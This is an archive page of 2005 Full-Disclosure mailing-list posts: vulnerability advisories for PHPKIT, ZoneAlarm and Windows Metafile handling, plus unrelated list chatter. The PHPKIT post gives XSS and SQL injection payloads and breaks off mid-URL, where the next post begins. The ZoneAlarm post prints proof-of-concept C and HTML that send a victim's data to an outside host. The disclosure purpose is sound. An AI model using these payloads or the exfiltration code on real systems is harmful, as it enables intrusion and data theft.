[Full-disclosure] Advisory 21/2005: Multiple vulnerabilities in PHPKIT
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: Multiple vulnerabilities in PHPKIT
Release Date: 2005/11/07
Last Modified: 2005/11/04
Author: Christopher Kunz [EMAIL PROTECTED]
Application: PHPKIT 1.6.1 R2 and prior
Severity: Cross-Site Scripting, SQL injection and information
disclosure, password hash disclosure, local file
disclosure, arbitrary code execution
Risk: High / Critical (depending on server configuration)
Vendor Status: No fix available
References: http://www.hardened-php.net/advisory_212005.80.html
Overview:
PHPKIT [1] is a combined content management, homepage building and community
software written in PHP. Although it is available as open source, it has
to be licensed for any other than private use. PHPKIT has the usual feat-
ures for that kind of product (content editing, forums, user management,
etc.). Typically for content management and portal systems, there are
multiple vulnerabilities in several places in the front- and backend.
The install base for PHPKIT can only be estimated - Google shows about
25,000 results for the query powered by phpkit [2].
Since we did not perform a full audit, there is no guarantee that the de-
scribed vulnerabilities are the only ones in the product.
Details:
1) XSS
Although the PHPKIT team seems to have made an effort to mitigate attacks
with cross-site scripting, this was only partially successful. We found
a number of critical XSS holes that can be exploited by any third party
to steal admin cookies, change HTML code, launch CSRF attacks and so on.
1.1) login/profile.php and login/userinfo.php
Two fields in the profile settings - those for AIM and Yahoo! screen
names - are inserted into the database without any input validation.
Thus, an XSS attack can be performed that is launched on any user who
looks at the offending profile.
The same attack can be launched on an administrator viewing a profile
via the administrator back-end.
1.2) admin/admin.php (with register_globals On)
Since the variable $site_body is not properly initialized, an attacker
can launch an XSS attack against the administrator login screen. This
attack can utilize DOM to steal the administrator's credentials in
cleartext as long as they have some kind of password safe function
in their browser. Since script code can be executed on load, all that
an attacker has to do is get the administrator to click on a manipula-
ted link.
1.3) Referrer statistics
By launching a HTTP request with the Referer set to some script code,
e.g. scriptalert('foo')/script, an attacker prompts this code to
be included in the administrative backend, and executed as soon as
an administrator views the referrer statistics. This comes in handy
since it is a quasi-anonymous way of obtaining the administrator's
session cookies.
1.4) Forum
Although input filtering takes place in the subject and content of
a forum postings, no such filtering is performed when constructing
the HTML title tag and the logo's img alt attribute - both con-
tain the thread subject in unfiltered HTML, and script code is execu-
ted twice per page.
1.5) imcenter.php
PHPKIT's own instant messaging system does not perform input validation
on the subject line, so any user can IM the admin and contain script
code in the subject.
1.6) Guestbook
The Homepage input field in the guest book is not properly sanitized
and any guest (no logged-in users, because their home page is not dis-
played by default) can enter script code. As usual, this is displayed
as soon as the guestbook is viewed.
2) SQL Injection
Same as above: Although many places inside the PHPKIT software are not
prone to SQL injection, some are. This leads to information disclosure
and possibly deletion of arbitrary data in the database.
2.1) SQL injection in profile pages (with magic_quotes_gpc Off)
Using a simple injection, any user of the PHPKIT-powered web site can
disclose the administrator's password hash. This is done via the $id
parameter in login/userinfo.php which is not properly sanitized. With
a crafted UNION statement, the attacker can obtain arbitrary data, in-
cluding but not limited to any user's password hash. A simple cast into
an int would have prevented this problem.
Example: include.php?path=login/userinfo.phpid='%20UNION%20SELECT%201,
1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
Re: [Full-disclosure] Re: readdir_r considered harmful
In practice, you're correct. In theory, however, consider the following code path. THREAD 1 THREAD 2 ---- DIR *d1 = opendir(dir1); DIR *d2 = opendir(dir2); dent1 = readdir(dir1); dent2 = readdir(dir2); use(dent1); In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe. The standard actually guarantees that the static storage is associated with the specific directory STREAM. So a system on which dent1 and dent2 point to the same buffer and reads from one stream affect the buffer returned by reads from another stream are not POSIX compliant. See: http://www.opengroup.org/onlinepubs/009695399/functions/readdir.html The pointer returned by readdir() points to data which may be overwritten by another call to readdir() on the same directory stream. This data is not overwritten by another call to readdir() on a different directory stream. But is also goes on to say: The readdir() function need not be reentrant. A function that is not required to be reentrant is not required to be thread-safe. which is the one thing I like POSIX to fix for thread safe implementations. Casper ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: [OTAnn] Feedback
shenanigans wrote in news:[EMAIL PROTECTED] I was interested in getting feedback from current mail group users. We have mirrored your mail list in a new application that provides a more aggregated and safe environment which utilizes the power of broadband. Utilizes the power of broadband? What a heap of marketing wankspeak! Roomity.com v 1.5 is a web 2.01 community webapp. Our newest version adds broadcast video and social networking such as favorite authors and an html editor. It?s free to join and any feedback would be appreciated. S. http://Full_Disclosure_Security_Discussion_List.roomity.com/ says: quote Your Firefox browser may not be set up correctly or it may need the required plugin. Please click support to configure your browser or find out what browsers we support and how.Support Page. If support page is not helpful please contact us end quote So I go look at the support page, and it's full of download this, run that, allow the other to install, open holes in your firewall, all in order to allow what it persists in describing as your broadband webapp. As if the app is in someway related to the kind of cable that carries the traffic. Sorry, no way on earth am I gonna run your wretched java virus/trojan just in order to get the opportunity to have marketing bullshit rammed down my throat. It's utter GARBAGE to claim that installing some completely unknown java application is somehow a safe environment compared to reading plain text emails. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OTAnn] Feedback
It?s free to join and any feedback would be appreciated. You might have had more luck posting it to vulnerable-idiots list rather than a security related one. Nobody's going to run your untrusted Java app and open their firewall. Better bet we'll download it and pick it apart though. Hope for your sake you secured your side better than you wrote this app. And BTW : I like the text based FD digests just fine. ~Mike. PS: anyone notice this one : Windows is the operating system on 98% of all PC's ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] [OTAnn] Feedback
Mike said: You might have had more luck posting it to vulnerable-idiots list rather than a security related one. Nobody's going to run your untrusted Java app and open their firewall. Better bet we'll download it and pick it apart though. Hope for your sake you secured your side better than you wrote this app. And BTW : I like the text based FD digests just fine. Mike, you don't want to get the filtered e-mail list with a lot of ads? Can't believe you are going to pass that up. Why would you mirror FD on a safe app anyways...does he not see all the exploits and malware that is exposed on this list. Why give it to people that don't understand it? -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability
Debasis,
i'll see the POC; but seems like finally you did it... after our last
discussion i was trying to kick some nasm code to do the same. good
finding!@
On 11/8/05, Debasis Mohanty [EMAIL PROTECTED] wrote:
Zone Labs Products Advance Program Control and OS Firewall (Behavioral
Based) Technology Bypass Vulnerability
I. PRODUCT BACKGROUND
ZoneAlarm Pro and Internet Security Suite with its a new level of protection
is what Zone Labs calls an OS Firewall based on Behavior Based Analysis
has gone beyond network level protection and protects PCs against various
local attacks on a windows machine. Currently available personal firewalls
protects PCs against only network based attacks however the new Zone Labs
OS firewall technology monitors activity at the kernel-level and prevents
attacks at various level. The new approach alerts the user by closely
monitoring at kernel level for any unusual activity in the system; like
changes in critical registry keys, changes in start-up entries, any kind of
Interprocess interactions and processes making outbound connections via
other trusted programs. When ZoneAlarm sees unusual activity between
applications, it can put the kibosh on memory being read, or quash
unauthorized driver and service loading. The PoC below discusses how the
ZoneAlarm Advance Program Control and Behavior Based Technology can be
defeated by using HTML Modal Dialog Box.
II. TECHNICAL DESCRIPTION
Zone Alarm products with Advance Program Control or OS Firewall Technology
enabled, detects and blocks almost all those APIs (like Shell,
ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by
malicious programs to send data via http by piggybacking over other trusted
programs. However, it is still possible for a malicious program (Trojans or
worms etc) to make outbound connections to the evil site by piggybacking
over trusted Internet browser using HTML Modal Dialog in conjunction with
simple JavaScript. Here it is assumed that the default browser (IE or
Firefox etc) has authorization to access internet. In case of the default
installation of ZoneAlarm Pro, IE is by default allowed to access internet.
The PoC (Proof-of-Concept) in Section V explains the hack and the exploit
code is also included for reference.
III.IMPACT
On successful exploitation the malicious program will be able to send the
victim's details and personal system information to the attacker and this
can further leads to complete system compromise.
IV. AFFECTED PRODUCTS
Zone Alarm Pro 6.0.x
Zone Alarm Internet Security Suit 6.0.x
Zone Alarm Firewall with Anti-Spyware 6.1.x
Zone Alarm Firewall with Anti-Virus 6.0.x
Zone Alarm Firewall (Free Version) 6.0.x
V. PROOF-OF-CONCEPT:
By using ShowHTMLDialog() method, it is possible for any malicious program
to creates a modal dialog box that displays HTML. This in turn can be used
to redirect the page to the attacker's site. It is observed that using this
method, ZA Pro and Internet Security Suit is unable to block internet
access. This method can be used by any malicious program to send data
outside via http to the attacker and at the same time it can also receive
the command instructions from the attacker. The detailed exploit code is
given below:
osfwbypass-demo.c
BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT(MSHTML.DLL));
if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
TEXT(ShowHTMLDialog));
if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(Lc:\\modal-dialog.htm);
CreateURLMoniker(NULL, bstrURL, pURLMoniker);
if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker-Release();
}
SysFreeString(bstrURL);
}
FreeLibrary(hinstMSHTML);
}
Return True;
}
+++
modal-dialog.htm
html
head
meta http-equiv=Content-Language content=en-us
titleRedirection Dialog/title
script language=JavaScript
!-- Here goes the information logged by the malicious program which will
be sent to the evil site via http request --
var sTargetURL =
http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your
Information Here]
window.location.href = sTargetURL;
window.close;
/script
/head
/html
+++
VI. DEMONSTRATION:
For a live demonstration, the compiled binary (osfwbypass-demo.exe) and
the html redirection script (modal-dialog.htm) has been enclosed with this
advisory. To test, kindly follow the following steps:
a. Extract both osfwbypass-demo.exe and modal-dialog.htm to C:\.
[Note: You can extract osfwbypass-demo.exe to whatever location you like
but don't change the location of modal-dialog.htm other than C:\
otherwise the PoC won't work.] - Just to save time, I had to
[Full-disclosure] [EEYEB-20050901] Windows Metafile SetPalette Entries Heap OVerflow Vulnerability (Graphics Rendering Engine Vulnerability)
Windows Metafile SetPalette Entries Heap OVerflow Vulnerability (Graphics Rendering Engine Vulnerability) Release Date: November 8, 2005 Date Reported: September 1, 2005 Severity: High (Code Execution) Vendor: Microsoft Systems Affected: Windows 2000 Windows XP SP0, SP1 Windows Server 2003 SP0 Overview: eEye Digital Security has discovered a vulnerability in the way the Windows Graphical Device Interface (GDI) processes Windows Metafile (WMF) format image files that would allow arbitrary code execution as a user who attempts to view a malicious image. An attacker could send such a metafile to a victim of his choice over any of a variety of attack vectors, including an HTML e-mail, a link to a web page, a metafile-bearing Microsoft Office document, or a chat message. Technical Details: The code in GDI32.DLL responsible for rendering Windows Metafiles contains an integer overflow vulnerability in the function PlayMetaFileRecord, cases 36h and 37h, which handle SetPaletteEntries-type records. If the reported length of such a record is 7FFFh or h, the following code will experience an integer overflow and can be made to allocate an insufficient heap block, the success of which incorrectly implies the validity of the length: 77F5BC38mov eax, [ebx] ; length field 77F5BC3Alea eax, [eax+eax+2] ; *** integer overflow *** 77F5BC3Epusheax 77F5BC3Fpushedi 77F5BC40callds:LocalAlloc ... 77F5BC51mov ecx, [ebx] ; length field 77F5BC53add eax, 2 77F5BC56shl ecx, 1 ; copy size != allocation size 77F5BC58mov edx, ecx ; intrinsic memcpy() follows 77F5BC5Amov esi, ebx 77F5BC5Cmov edi, eax 77F5BC5Eshr ecx, 2 77F5BC61rep movsd 77F5BC63mov ecx, edx 77F5BC65and ecx, 3 ... 77F5BC6Drep movsb Although the copy length is similarly subject to an integer overflow, the two differ by a +2 term, and therefore the allocation size can be made very small while keeping the copy length extremely large. The result is a complete heap overwrite with arbitrary binary data from the metafile. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink Endpoint Protection proactively protects users from this vulnerability. Vendor Status: Microsoft has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx Credit: Fang Xing Related Links: This vulnerability has been assigned the following IDs; EEYEB-20050901 OSVDB ID: CVE ID: CAN-2005-2123 Greetings: Thanks Derek and and eEye guys help me wrote this advisory. Greeting xfocus guys and venustech lab guys. Copyright (c) 1998-2005 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [EEYEB-20050329] Windows Metafile Multiple Heap Overflows
Windows Metafile Multiple Heap Overflows Release Date: November 8, 2005 Date Reported: March 29, 2005 Severity: High (Code Execution) Vendor: Microsoft Systems Affected: Windows 2000 Windows Server 2003 Overview: eEye Digital Security has discovered a heap overflow vulnerability in the way the Windows Graphical Device Interface (GDI) processes Windows enhanced metafile images (file extensions EMF and WMF). An attacker could send a malicious metafile to a victim of his choice over any of a variety of media -- such as HTML e-mail, a link to a web page, a metafile-bearing Microsoft Office document, or a chat message -- in order to execute code on that user's system at the user's privilege level. Technical Details: The Windows metafile rendering code in GDI32.DLL contains a number of integer overflow flaws in its processing of EMF/WMF file data that lead to exploitable heap overflows through any number of specially crafted metafile structures. For example, the following disassembly from MRBP16::bCheckRecord demonstrates a size calculation that is susceptible to integer overflow and as a result may pass validation with a dangerous value: 77F6C759mov edx, [ecx+18h]; malicious count (e.g., 800Dh) 77F6C75Cmov eax, [ecx+4] ; heap allocation size ... 77F6C764lea edx, [edx*4+1Ch] ; EDX = 3FF9h: integer overflow 77F6C76Bcmp edx, eax ; validation check 77F6C76Djnz 77F6C77F Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink Endpoint Protection proactively protects users from this vulnerability. Vendor Status: Microsoft has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx Credit: Fang Xing Related Links: This vulnerability has been assigned the following IDs; EEYEB-20050329 OSVDB ID: 18820 CVE ID: CAN-2005-2124 Greetings: Thanks Derek and and eEye guys help me wrote this advisory. Greeting xfocus guys and venustech lab guys. Copyright (c) 1998-2005 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Security Updates Without Rebooting
-BEGIN PGP SIGNED MESSAGE- Hash: MD5 Tuesday, November 8, 2005, 2:48:28 AM, Valdis wrote: Or, if you're able to identify I only applied an Apache patch, you may very well be able to only restart that one service. For RedHat/Fedora systems, you'd do this with 'service httpd restart' (or replace httpd with the name of the /etc/init.d script that starts/stops the service in question). For other systems, you should be able to find a similar stop then restart for the specific daemon in question. Well, if I could make a small suggestion, I never use the /etc/rc.d or /etc/init.d scripts on my servers. I have long ago switched to daemontools - http://cr.yp.to/daemontools.html [there are similar solutions for those who don't like daemontools, eg. a very similar one called runit - http://smarden.org/runit/]. There are a couple of security and ease-of-use reasons to do that: * a service such as daemontools or runit will make sure your service is running even if something causes it to fail temporarily, as it monitors the service every second and restarts it if necessary * for every service monitored all I need to do to restart it after a security update is svc -t /service/servicename. Obviously, RPMs will not restart such services, so this is a drawback, but I find this a very good, platform-independent [eg. some distributions use the SysV scripts, some use other solutions] method to control services that also makes sure for me that the service is always running. The drawback is the fact that not all services can be run in the foreground [this is required for daemontools/runit] and that writing your own run scripts might sometimes be difficult [but the runit page contains a bunch of ready-made run scripts for most popular services]. - -- Tomasz Nidecki, Sekr. Redakcji / Managing Editor hakin9 magazinehttp://www.hakin9.org mailto:[EMAIL PROTECTED] jid:[EMAIL PROTECTED] Do you know what hacker means? http://www.catb.org/~esr/faqs/hacker-howto.html Czy wiesz, co znaczy slowo haker? http://www.jtz.org.pl/Inne/hacker-howto-pl.html -BEGIN PGP SIGNATURE- Version: 2.6 iQCVAwUAQ3Cp10R7PdagQ735AQHllwP/Z1WjjO/dD2T8KWGJy6h1vJ4p3YTVfImE G3iXFv2mI9yrQA2TngNQsmZVvSTAhTxFRf3B9mctWZnbYbc80WA7qObt3OhzViB4 TXm/DeiJRsfIZz7+N2aUZmfZckIaRbiKpe/Gpi31bT8/qbLFYvN2vj0pxxdWOvhS B5njPTCWG7I= =5G0b -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Digg dot com
Hi security community, Ground breaking research http://digg.com/security/Dugging_on_Digg ;-) Think Myspace... get researching. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Securtiy Contact for Avast, Symantec and AvG please
If I rmember, for symantec there is also [EMAIL PROTECTED], cheers man ;) -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Thierry Zoller Envoyé : mardi 8 novembre 2005 19:45 À : full-disclosure@lists.grok.org.uk Objet : [Full-disclosure] Securtiy Contact for Avast,Symantec and AvG please If you care and you read this list get in touch with me. AVG - No I will not send you my license number prior to doing research for you... Symantec - twice at [EMAIL PROTECTED] should be enough no ? Avast - http://secdev.zoller.lu -- Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Securtiy Contact for Avast, Symantec and AvG please
Yes, they list [EMAIL PROTECTED] as an official address: Responsible security researchers work with the Symantec Product Security team through the email address [EMAIL PROTECTED] http://securityresponse.symantec.com/security/ - Juha-Matti If I rmember, for symantec there is also [EMAIL PROTECTED], cheers man ;) -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Thierry Zoller Envoyé : mardi 8 novembre 2005 19:45 À : full-disclosure@lists.grok.org.uk Objet : [Full-disclosure] Securtiy Contact for Avast,Symantec and AvG please If you care and you read this list get in touch with me. AVG - No I will not send you my license number prior to doing research for you... Symantec - twice at [EMAIL PROTECTED] should be enough no ? Avast - http://secdev.zoller.lu -- Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDKSA-2005:206 - Updated openvpn packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:206 http://www.mandriva.com/security/ ___ Package : openvpn Date: November 8, 2005 Affected: Multi Network Firewall 2.0 ___ Problem Description: Two Denial of Service vulnerabilities exist in OpenVPN. The first allows a malicious or compromised server to execute arbitrary code on the client (CVE-2005-3393). The second DoS can occur if when in TCP server mode, OpenVPN received an error on accept(2) and the resulting exception handler causes a segfault (CVE-2005-3409). The updated packages have been patched to correct these problems. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3393 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3409 ___ Updated Packages: Multi Network Firewall 2.0: 6d05d03341ef7c99bd0c044ac14383c7 mnf/2.0/RPMS/openvpn-2.0.1-0.2.M20mdk.i586.rpm 8882e7500e1fb8a255f5f50885042608 mnf/2.0/SRPMS/openvpn-2.0.1-0.2.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDcSaomqjQ0CJFipgRAqpcAKCm5jQa0I3yoYNq2KF/IfE0ygaTdwCgrYlc CH/Ar8bO2UfJ3ciAqdY9jz0= =IPL2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] sugget a small pentest distro
Hi, can anyone suggest a small pentest liux distro.smallest means(under 250 mb.),i seen one on whax site.has any one used it? no google please -- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) oh yeah oh yeah... another wannabe, in hackerland!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sugget a small pentest distro
I like knoppix STD, it fits on a CD, but hasn't been updated in sometime. First hit on google for live linux cds http://www.frozentech.com/content/livecd.php?pick=Allshowonly=security I even narrowed it down to the security section for your lazy ass. crazy frog crazy frog wrote: Hi, can anyone suggest a small pentest liux distro.smallest means(under 250 mb.),i seen one on whax site.has any one used it? no google please -- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) oh yeah oh yeah... another wannabe, in hackerland!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sugget a small pentest distro
On Wed, 09 Nov 2005 12:41:41 +0530, crazy frog crazy frog said: i know ab tlal thjose distros auditor,phlak,whax etc but what i want is a distro whose size is much smaller among this distros. So take one of those distros and heave stuff over the side until you get it small enough. Note that there's only 2 constraints - the 650-700M that will fit on a standard CD, and the 250M or so that you can fit onto one of the credit card sized chopped-down CDs. The distinction only matters if the pen test assumes that you can sneak a cut-down CD onto the site, but can't find a way to get a regular CD onto the site (if all else fails, buy a portable CD player, scribble My Fave Metal on your pen-test disk, and see if you can social-engineer it past the guard. If you're *really* good, you can even burn it so the CD player will see 3 or 4 good metal cuts, so you can crank it up and prove it's a music CD. ;) pgpwSTdEK1G1M.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
